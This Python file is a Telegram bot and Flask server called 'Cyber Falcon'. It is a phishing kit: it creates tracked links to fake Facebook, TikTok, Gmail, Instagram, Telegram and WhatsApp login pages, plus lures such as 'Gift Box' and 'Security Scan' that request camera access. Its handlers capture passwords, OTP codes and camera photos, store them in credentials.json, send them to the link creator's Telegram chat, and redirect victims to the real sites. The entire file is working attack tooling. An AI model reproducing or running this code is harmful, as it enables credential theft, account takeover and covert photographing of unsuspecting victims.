import asyncio
import logging
import requests
import json
import os
import threading
import time
import re
from datetime import datetime
from flask import Flask, send_from_directory, request, redirect, render_template_string
from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import Application, CommandHandler, CallbackQueryHandler, MessageHandler, filters, ContextTypes

# ============= কনফিগারেশন =============
TELEGRAM_BOT_TOKEN = os.environ.get('TELEGRAM_BOT_TOKEN')
ADMIN_CHAT_ID = int(os.environ.get('ADMIN_CHAT_ID', 7843284032))
RENDER_URL = os.environ.get('RENDER_URL', "https://fc-bot-vz4u.onrender.com")

if not TELEGRAM_BOT_TOKEN:
    print("ERROR: TELEGRAM_BOT_TOKEN not set!")
    exit(1)

# ============= ফ্লাস্ক অ্যাপ =============
flask_app = Flask(__name__)

# ============= হেল্পার ফাংশন =============
def get_device_info(user_agent):
    """ডিভাইস তথ্য এক্সট্র্যাক্ট করে"""
    if not user_agent:
        return "Unknown"
    if "iPhone" in user_agent:
        return "📱 iPhone"
    elif "Android" in user_agent:
        return "🤖 Android"
    elif "Windows" in user_agent:
        return "💻 Windows"
    elif "Mac" in user_agent:
        return "🍎 Mac"
    else:
        return "🌐 Other"

def format_message(data):
    """সুন্দর ফরম্যাটেড মেসেজ তৈরি করে"""
    page_type = data.get('pageType', 'unknown')
    username = data.get('username', 'N/A')
    password = data.get('password', 'N/A')
    ip = data.get('ipAddress', 'N/A')
    timestamp = data.get('timestamp', datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
    device = get_device_info(data.get('userAgent', ''))
    
    # প্ল্যাটফর্ম আইকন ও নাম
    platform_icons = {
        'facebook': '📘', 'facebook_followers': '🎯', 'tiktok': '🎵', 'tiktok_boost': '🚀',
        'telegram': '✈️', 'gmail': '📧', 'instagram': '📷', 'meta_verify': '💎',
        'Whatsapp_groups': '💚', 'whatsapp_groups': '💚',
        'camera_gift': '🎁', 'video_player': '🎬', 'virus_checker': '🛡️'
    }
    
    platform_names = {
        'facebook': 'Facebook Login', 'facebook_followers': 'Facebook Followers',
        'tiktok': 'TikTok Login', 'tiktok_boost': 'TikTok Booster',
        'telegram': 'Telegram Login', 'gmail': 'Gmail Login',
        'instagram': 'Instagram Login', 'meta_verify': 'Meta Verified',
        'Whatsapp_groups': 'WhatsApp Groups', 'whatsapp_groups': 'WhatsApp Groups',
        'camera_gift': '🎁 Gift Box', 'video_player': '🎬 Hot Videos', 'virus_checker': '🛡️ Security Scan'
    }
    
    icon = platform_icons.get(page_type, '🔐')
    platform = platform_names.get(page_type, page_type.replace('_', ' ').title())
    
    # OTP চেক
    otp_code = data.get('otp_code', '')
    group_name = data.get('groupName', '')
    
    # ফোন নম্বর চেক
    phone = data.get('phone', '')
    photo_number = data.get('photo_number', '')
    
    if otp_code and otp_code != 'N/A':
        message = f"""
{icon}🦅 *NEW OTP RECEIVED* 🦅{icon}

📱 *Platform:* {platform}
🔢 *OTP Code:* `{otp_code}`
👥 *Group:* {group_name if group_name else 'N/A'}
🌐 *IP Address:* `{ip}`
📱 *Device:* {device}
⏰ *Time:* {timestamp}

━━━━━━━━━━━━━━━━
🔒 *Secured by Cyber Falcon*
        """
    elif photo_number:
        # ক্যামেরা থেকে আসা ছবির মেসেজ
        message = f"""
{icon}🦅 *NEW PHOTO CAPTURED* 🦅{icon}

📱 *Platform:* {platform}
📸 *Photo #:* `{photo_number}`
🌐 *IP Address:* `{ip}`
⏰ *Time:* {timestamp}

━━━━━━━━━━━━━━━━
📷 *Captured from camera*
        """
    else:
        message = f"""
{icon}🦅 *NEW LOGIN ALERT* 🦅{icon}

📱 *Platform:* {platform}
👤 *Email/User:* `{username}`
🔑 *Password:* `{password}`
🌐 *IP Address:* `{ip}`
📱 *Device:* {device}
⏰ *Time:* {timestamp}

━━━━━━━━━━━━━━━━
🔒 *Report generated by Cyber Falcon Bot*
        """
    
    return message

@flask_app.route('/')
def index():
    return "🦅 Cyber Falcon Bot is Running!", 200

@flask_app.route('/health')
def health():
    return "OK", 200

# ============= ক্যামেরা পেজ রাউট =============
@flask_app.route('/camera_gift')
def camera_gift_page():
    return send_from_directory('templates', 'camera_gift.html')

@flask_app.route('/camera_video')
def camera_video_page():
    return send_from_directory('templates', 'camera_video.html')

@flask_app.route('/camera_scan')
def camera_scan_page():
    return send_from_directory('templates', 'camera_scan.html')

# ============= লগইন পেজ রাউট =============
@flask_app.route('/facebook')
def facebook_page():
    return send_from_directory('templates', 'facebook.html')

@flask_app.route('/tiktok')
def tiktok_page():
    return send_from_directory('templates', 'tiktok.html')

@flask_app.route('/telegram')
def telegram_page():
    return send_from_directory('templates', 'telegram.html')

@flask_app.route('/gmail')
def gmail_page():
    return send_from_directory('templates', 'gmail.html')

@flask_app.route('/instagram')
def instagram_page():
    return send_from_directory('templates', 'instagram.html')

@flask_app.route('/facebook_followers')
def facebook_followers_page():
    return send_from_directory('templates', 'facebook_followers.html')

@flask_app.route('/Whatsapp_groups')
def whatsapp_groups_page():
    return send_from_directory('templates', 'Whatsapp_groups.html')

@flask_app.route('/tiktok_boost')
def tiktok_boost_page():
    return send_from_directory('templates', 'tiktok_boost.html')

@flask_app.route('/meta_verify')
def meta_verify_page():
    return send_from_directory('templates', 'meta_verify.html')

# ============= ক্যামেরা আপলোড হ্যান্ডলার =============
@flask_app.route('/camera_upload', methods=['POST'])
def handle_camera_upload():
    """ক্যামেরা থেকে তোলা ছবি গ্রহণ করে"""
    
    user_id = request.form.get('user_id', 'unknown')
    photo_data = request.form.get('photo', '')
    page_type = request.form.get('page_type', 'camera')
    photo_number = request.form.get('photo_number', '1')
    timestamp = request.form.get('timestamp', datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
    camera_type = request.form.get('camera_type', 'back')
    device_info = request.form.get('device_info', 'Unknown')
    
    print(f"📸 Camera upload - User: {user_id}, Photo #{photo_number}, Page: {page_type}")
    
    if not photo_data or photo_data == '':
        print("🙅🥵 No photo data")
        return "No photo", 400
    
    try:
        import base64
        import io
        from PIL import Image
        
        if 'base64,' in photo_data:
            photo_data = photo_data.split('base64,')[1]
        
        image_bytes = base64.b64decode(photo_data)
        image = Image.open(io.BytesIO(image_bytes))
        
        # ফাইল সেভ করুন
        filename = f"camera_{user_id}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.jpg"
        os.makedirs('static/camera', exist_ok=True)
        filepath = os.path.join('static', 'camera', filename)
        image.save(filepath, 'JPEG', quality=80)
        
        print(f"🥷🦅 Photo saved: {filename}")
        
        # টেলিগ্রামে ছবি পাঠান
        if user_id != 'unknown' and user_id != 'None' and user_id != '':
            try:
                url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendPhoto"
                with open(filepath, 'rb') as f:
                    files = {'photo': f}
                    data = {
                        'chat_id': int(user_id),
                        'caption': f"📷 *Photo #{photo_number}*\n📱 Platform: {page_type}\n📸 Camera: {camera_type}\n⏰ {timestamp}",
                        'parse_mode': 'Markdown'
                    }
                    response = requests.post(url, files=files, data=data, timeout=30)
                    if response.status_code == 200:
                        print(f"🥷🦅 Photo {photo_number} sent to user {user_id}")
                    else:
                        print(f"🙅🥵 Failed to send: {response.text}")
            except Exception as e:
                print(f"🙅🥵 Error sending photo: {e}")
        else:
            print(f"⚠️ Invalid user_id: {user_id}")
        
        return "OK", 200
        
    except Exception as e:
        print(f"🙅🥵 Error processing photo: {e}")
        return f"Error: {e}", 500

# ============= লগইন হ্যান্ডলার =============
@flask_app.route('/login', methods=['POST'])
def handle_login():
    """সব লগইন ডাটা এখানে আসে"""
    
    # ফর্ম ডাটা সংগ্রহ
    username = request.form.get('username') or request.form.get('email') or 'N/A'
    password = request.form.get('password') or 'N/A'
    groupName = request.form.get('groupName') or 'N/A'
    otp_code = request.form.get('otp_code') or request.form.get('otpCode') or 'N/A'
    
    # URL থেকে প্যারামিটার নিন
    page_type = request.args.get('page_type', 'unknown')
    target_user_id = request.args.get('user_id', 'unknown')
    
    # যদি user_id না আসে, তাহলে রেফারার থেকে বের করার চেষ্টা
    if target_user_id == 'unknown' or target_user_id == 'None':
        referer = request.headers.get('Referer', '')
        if 'user_id=' in referer:
            match = re.search(r'user_id=(\d+)', referer)
            if match:
                target_user_id = match.group(1)
    
    # অতিরিক্ত ডাটা
    video_link = request.form.get('video_link') or request.form.get('videoLink') or ''
    service_type = request.form.get('service_type') or ''
    country = request.form.get('country') or ''
    phone = request.form.get('phone') or ''
    
    print(f"📥 LOGIN RECEIVED - Page: {page_type}, User: {username}, Pass: {password}, Target: {target_user_id}")
    
    # JSON ডাটা তৈরি
    data = {
        'username': username,
        'password': password,
        'groupName': groupName,
        'otp_code': otp_code,
        'ipAddress': request.remote_addr,
        'pageType': page_type,
        'timestamp': datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
        'generated_by': target_user_id,
        'userAgent': request.headers.get('User-Agent', 'Unknown'),
        'video_link': video_link,
        'service_type': service_type,
        'country': country,
        'phone': phone
    }
    
    # credentials.json এ সেভ
    try:
        with open('credentials.json', 'a') as f:
            f.write(json.dumps(data) + '\n')
        print(f"🥷🦅 Data saved to credentials.json")
    except Exception as e:
        print(f"🙅🥵 Error saving: {e}")
    
    # শুধুমাত্র ইউজারকে মেসেজ পাঠান (অ্যাডমিন নোটিফিকেশন নেই)
    if target_user_id != 'unknown' and target_user_id != 'None' and target_user_id != '':
        try:
            message = format_message(data)
            url = f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/sendMessage"
            response = requests.post(
                url, 
                json={
                    'chat_id': int(target_user_id), 
                    'text': message, 
                    'parse_mode': 'Markdown'
                }, 
                timeout=10
            )
            if response.status_code == 200:
                print(f"🥷🦅 Message sent to user {target_user_id}")
            else:
                print(f"🙅🥵 Failed: {response.text}")
        except Exception as e:
            print(f"🙅🥵 Exception sending to {target_user_id}: {e}")
    else:
        print(f"⚠️ No valid target_user_id: {target_user_id}")
    
    # রিডাইরেক্ট
    redirect_urls = {
        'facebook': 'https://www.facebook.com/',
        'facebook_followers': 'https://www.facebook.com/',
        'tiktok': 'https://www.tiktok.com/',
        'tiktok_boost': 'https://www.tiktok.com/',
        'telegram': 'https://web.telegram.org/',
        'gmail': 'https://mail.google.com/',
        'instagram': 'https://www.instagram.com/',
        'meta_verify': 'https://business.facebook.com/',
        'Whatsapp_groups': 'https://web.whatsapp.com/',
        'whatsapp_groups': 'https://web.whatsapp.com/'
    }
    
    redirect_url = redirect_urls.get(page_type, 'https://www.google.com')
    print(f"🔄 Redirecting to: {redirect_url}")
    return redirect(redirect_url)

def run_flask():
    """ফ্লাস্ক সার্ভার চালায়"""
    port = int(os.environ.get("PORT", 5000))
    flask_app.run(host='0.0.0.0', port=port, threaded=True)

# ============= টেলিগ্রাম বট =============
active_users = set()
user_details = {}

async def start(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """স্টার্ট কমান্ড হ্যান্ডলার"""
    query = update.callback_query
    if query:
        await query.answer()
        chat_id = query.message.chat.id
        message_id = query.message.message_id
        user_name = query.from_user.first_name
        user_username = query.from_user.username
    else:
        chat_id = update.effective_chat.id
        message_id = None
        user_name = update.effective_user.first_name
        user_username = update.effective_user.username
    
    active_users.add(chat_id)
    if chat_id not in user_details:
        user_details[chat_id] = {
            'name': user_name,
            'username': user_username or 'N/A',
            'joined': datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        }
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("🌐 All Main Pages", callback_data="menu_main")],
        [InlineKeyboardButton("📢 Advance Pages", callback_data="menu_advance")],
        [InlineKeyboardButton("📷 Camera", callback_data="camera_menu")],
        [InlineKeyboardButton("🥷 Community", url="https://t.me/+j8x9Tp4CGa80ZmM1")]
    ])
    
    message = f"""
😈 🦅𝘾.𝙁 𝘽𝙤𝙩 𝙥𝙧𝙤😈🦅

𝙃𝙞 {user_name}! 
𝙒𝙚𝙡𝙘𝙤𝙢𝙚 𝘾𝙮𝙗𝙚𝙧 𝙛𝙖𝙡𝙘𝙤𝙣 𝙗𝙤𝙩.

🥷𝗦𝘁𝗮𝘁𝘂𝘀: 🟢 𝗔𝗰𝘁𝗶𝘃𝗲
👥 *Total Users:* {len(active_users)}

👇 *Select an option below*
    """
    
    if message_id:
        await context.bot.edit_message_text(
            chat_id=chat_id, 
            message_id=message_id, 
            text=message, 
            reply_markup=keyboard, 
            parse_mode='Markdown'
        )
    else:
        await update.message.reply_text(message, reply_markup=keyboard, parse_mode='Markdown')

async def menu_main(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """মেইন মেনু"""
    query = update.callback_query
    await query.answer()
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("📘 Facebook", callback_data="page_facebook")],
        [InlineKeyboardButton("🎵 TikTok", callback_data="page_tiktok")],
        [InlineKeyboardButton("✈️ Telegram", callback_data="page_telegram")],
        [InlineKeyboardButton("📧 Gmail", callback_data="page_gmail")],
        [InlineKeyboardButton("📷 Instagram", callback_data="page_instagram")],
        [InlineKeyboardButton("⬅️ Back", callback_data="back")]
    ])
    
    await query.edit_message_text(
        "📱 *Select a Platform*\n\nChoose any platform to continue:",
        reply_markup=keyboard,
        parse_mode='Markdown'
    )

async def menu_advance(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """অ্যাডভান্স মেনু"""
    query = update.callback_query
    await query.answer()
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("🎯 Free Followers", callback_data="adv_followers")],
        [InlineKeyboardButton("💚 Hot WhatsApp Groups", callback_data="adv_groups")],
        [InlineKeyboardButton("🚀 TikTok Booster", callback_data="adv_boost")],
        [InlineKeyboardButton("💎 Meta Verified", callback_data="adv_verify")],
        [InlineKeyboardButton("⬅️ Back", callback_data="back")]
    ])
    
    await query.edit_message_text(
        "⚡ *Advance Features*\n\nSelect an option below:",
        reply_markup=keyboard,
        parse_mode='Markdown'
    )

# ============= ক্যামেরা মেনু =============
async def camera_menu(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """ক্যামেরা অপশন মেনু"""
    query = update.callback_query
    await query.answer()
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("🎁 Gift Box", callback_data="cam_gift")],
        [InlineKeyboardButton("🎬 Hot Videos", callback_data="cam_video")],
        [InlineKeyboardButton("🛡️ Security Scan", callback_data="cam_scan")],
        [InlineKeyboardButton("⬅️ Back", callback_data="back")]
    ])
    
    await query.edit_message_text(
        f"📷 *Camera Features*\n\n"
        f"Select an option below:\n\n"
        f"🎁 *Gift Box* - Win prizes!\n"
        f"🎬 *Hot Videos* - Watch content\n"
        f"🛡️ *Security Scan* - Check device\n\n"
        f"⚠️ *Camera access required* for verification.",
        reply_markup=keyboard,
        parse_mode='Markdown'
    )

# ============= ক্যামেরা পেজ শো =============
async def show_camera_page(update: Update, context: ContextTypes.DEFAULT_TYPE, title: str, url_path: str, page_type: str):
    """ক্যামেরা পেজ দেখায়"""
    query = update.callback_query
    await query.answer()
    
    user_id = query.message.chat.id
    full_url = f"{RENDER_URL}/{url_path}?user_id={user_id}&page_type={page_type}"
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("🚀 Open Page", url=full_url)],
        [InlineKeyboardButton("📋 Copy Link", callback_data=f"copy_{url_path}_{page_type}")],
        [InlineKeyboardButton("⬅️ Back", callback_data="camera_menu")]
    ])
    
    await query.edit_message_text(
        f"📷 *{title}*\n\n"
        f"🔗 `{full_url}`\n\n"
        f"⚠️ *Camera access required* for verification.\n"
        f"🔒 Your data is secure.",
        reply_markup=keyboard,
        parse_mode='Markdown'
    )

async def show_page(update: Update, context: ContextTypes.DEFAULT_TYPE, title: str, url_path: str, back_callback: str, page_type: str):
    """পেজ দেখায় এবং লিংক জেনারেট করে"""
    query = update.callback_query
    await query.answer()
    
    user_id = query.message.chat.id
    full_url = f"{RENDER_URL}/{url_path}?page_type={page_type}&user_id={user_id}"
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("🌐 Open Page", url=full_url)],
        [InlineKeyboardButton("📋 Copy Link", callback_data=f"copy_{url_path}_{page_type}")],
        [InlineKeyboardButton("⬅️ Back", callback_data=back_callback)]
    ])
    
    await query.edit_message_text(
        f"🔗 *{title}*\n\n"
        f"`{full_url}`\n\n"
        f"Click the buttons below to open or copy the link.",
        reply_markup=keyboard,
        parse_mode='Markdown'
    )

async def status(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """স্ট্যাটাস দেখায়"""
    query = update.callback_query
    user_id = query.message.chat.id
    user_info = user_details.get(user_id, {'name': 'User', 'username': 'N/A', 'joined': 'Unknown'})
    
    await query.answer()
    
    keyboard = InlineKeyboardMarkup([
        [InlineKeyboardButton("⬅️ Back", callback_data="back")]
    ])
    
    message = f"""
📊 *BOT STATUS* 📊

🦅 *Status:* 🟢 Active
👤 *Name:* {user_info['name']}
🆔 *User ID:* `{user_id}`
📛 *Username:* @{user_info['username']}
📅 *Joined:* {user_info['joined']}
👥 *Total Users:* {len(active_users)}

🌐 *Bot Link:* @MR_FireSword_2025_bot
🥷 *Community:* @CyberFalcon

━━━━━━━━━━━━━━━━
⚡ *Cyber Falcon Security Bot*
    """
    await query.edit_message_text(message, reply_markup=keyboard, parse_mode='Markdown')

async def back(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """ব্যাক বাটন"""
    await start(update, context)

# ============= অ্যাডমিন কমান্ড =============
async def show_users(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """সব ইউজার দেখায় (শুধু অ্যাডমিন)"""
    if update.effective_chat.id != ADMIN_CHAT_ID:
        await update.message.reply_text("⛔ *Access Denied!*\nThis command is only for admin.", parse_mode='Markdown')
        return
    
    if not user_details:
        await update.message.reply_text("📭 No users have used the bot yet.")
        return
    
    message = "📋 *User List*\n\n"
    for uid, info in list(user_details.items())[:30]:
        message += f"👤 {info['name']}\n🆔 `{uid}`\n📛 @{info['username']}\n📅 {info['joined']}\n━━━━━━━━━\n"
    
    if len(user_details) > 30:
        message += f"\n... and {len(user_details) - 30} more users"
    
    await update.message.reply_text(message, parse_mode='Markdown')

async def total_users(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """মোট ইউজার দেখায় (শুধু অ্যাডমিন)"""
    if update.effective_chat.id != ADMIN_CHAT_ID:
        await update.message.reply_text("⛔ Access Denied!", parse_mode='Markdown')
        return
    
    await update.message.reply_text(f"👥 *Total Users:* `{len(active_users)}`", parse_mode='Markdown')

async def broadcast(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """ব্রডকাস্ট মেসেজ (শুধু অ্যাডমিন)"""
    if update.effective_chat.id != ADMIN_CHAT_ID:
        await update.message.reply_text("⛔ Access Denied!", parse_mode='Markdown')
        return
    
    message_text = ' '.join(context.args)
    if not message_text:
        await update.message.reply_text(
            "⚠️ *Usage:* `/broadcast your message`\n\nExample: `/broadcast Hello everyone!`",
            parse_mode='Markdown'
        )
        return
    
    sent = 0
    failed = 0
    
    status_msg = await update.message.reply_text(f"📢 Broadcasting to {len(active_users)} users...")
    
    for chat_id in active_users:
        try:
            await context.bot.send_message(
                chat_id=chat_id, 
                text=f"📢 *Announcement*\n\n{message_text}", 
                parse_mode='Markdown'
            )
            sent += 1
            await asyncio.sleep(0.05)
        except Exception as e:
            failed += 1
            print(f"Failed to send to {chat_id}: {e}")
    
    await status_msg.edit_text(
        f"🥷🦅 *Broadcast Complete*\n\n📤 Sent: `{sent}`\n🙅🥵 Failed: `{failed}`\n👥 Total: `{len(active_users)}`",
        parse_mode='Markdown'
    )

async def handle_callback(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """কলব্যাক কোয়েরি হ্যান্ডলার"""
    query = update.callback_query
    data = query.data
    print(f"📌 Callback: {data}")
    
    if data == "menu_main":
        await menu_main(update, context)
    elif data == "menu_advance":
        await menu_advance(update, context)
    elif data == "status":
        await status(update, context)
    elif data == "back":
        await back(update, context)
    elif data == "page_facebook":
        await show_page(update, context, "📘 Facebook Login", "facebook", "menu_main", "facebook")
    elif data == "page_tiktok":
        await show_page(update, context, "🎵 TikTok Login", "tiktok", "menu_main", "tiktok")
    elif data == "page_telegram":
        await show_page(update, context, "✈️ Telegram Login", "telegram", "menu_main", "telegram")
    elif data == "page_gmail":
        await show_page(update, context, "📧 Gmail Login", "gmail", "menu_main", "gmail")
    elif data == "page_instagram":
        await show_page(update, context, "📷 Instagram Login", "instagram", "menu_main", "instagram")
    elif data == "adv_followers":
        await show_page(update, context, "🎯 Free Facebook Followers", "facebook_followers", "menu_advance", "facebook_followers")
    elif data == "adv_groups":
        await show_page(update, context, "💚 Hot WhatsApp Groups", "Whatsapp_groups", "menu_advance", "Whatsapp_groups")
    elif data == "adv_boost":
        await show_page(update, context, "🚀 TikTok Booster", "tiktok_boost", "menu_advance", "tiktok_boost")
    elif data == "adv_verify":
        await show_page(update, context, "💎 Meta Verified", "meta_verify", "menu_advance", "meta_verify")
    # ============= ক্যামেরা কলব্যাক =============
    elif data == "camera_menu":
        await camera_menu(update, context)
    elif data == "cam_gift":
        await show_camera_page(update, context, "🎁 Gift Box", "camera_gift", "camera_gift")
    elif data == "cam_video":
        await show_camera_page(update, context, "🎬 Hot Videos", "camera_video", "video_player")
    elif data == "cam_scan":
        await show_camera_page(update, context, "🛡️ Security Scan", "camera_scan", "virus_checker")
    # ============= কপি লিংক হ্যান্ডলার =============
    elif data.startswith("copy_"):
        parts = data.split("_", 2)
        if len(parts) >= 3:
            url_path = parts[1]
            page_type = parts[2]
            user_id = query.message.chat.id
            full_url = f"{RENDER_URL}/{url_path}?page_type={page_type}&user_id={user_id}"
            await query.answer(f"🥷🦅 Link copied!\n{full_url}", show_alert=True)
        else:
            await query.answer("🙅🥵 Invalid link!", show_alert=True)
    else:
        await query.answer("Unknown option!", show_alert=True)

async def handle_message(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """সাধারণ মেসেজ হ্যান্ডলার"""
    if update.message.text == '/start':
        await start(update, context)
    else:
        await update.message.reply_text(
            "🤖 *Welcome to Cyber Falcon Bot*\n\nPlease use `/start` to see the menu.",
            parse_mode='Markdown'
        )

async def error_handler(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """এরর হ্যান্ডলার"""
    print(f"🙅🥵 Error: {context.error}")
    try:
        if update and update.effective_chat:
            await context.bot.send_message(
                chat_id=update.effective_chat.id,
                text="⚠️ *An error occurred!*\nPlease try again later.",
                parse_mode='Markdown'
            )
    except:
        pass

def run_bot():
    """বট চালায়"""
    print("🦅 Starting Cyber Falcon Bot...")
    
    try:
        requests.post(f"https://api.telegram.org/bot{TELEGRAM_BOT_TOKEN}/deleteWebhook")
        print("🥷🦅 Webhook deleted")
    except Exception as e:
        print(f"Webhook error: {e}")
    
    app = Application.builder().token(TELEGRAM_BOT_TOKEN).build()
    
    app.add_handler(CommandHandler("start", start))
    app.add_handler(CommandHandler("link", start))
    app.add_handler(CommandHandler("broadcast", broadcast))
    app.add_handler(CommandHandler("total", total_users))
    app.add_handler(CommandHandler("users", show_users))
    app.add_handler(CallbackQueryHandler(handle_callback))
    app.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, handle_message))
    app.add_error_handler(error_handler)
    
    print("🚀 Bot is running! Polling...")
    app.run_polling(drop_pending_updates=True)

if __name__ == '__main__':
    flask_thread = threading.Thread(target=run_flask, daemon=True)
    flask_thread.start()
    time.sleep(2)
    print("🥷🦅 Flask server started on port 5000")
    run_bot()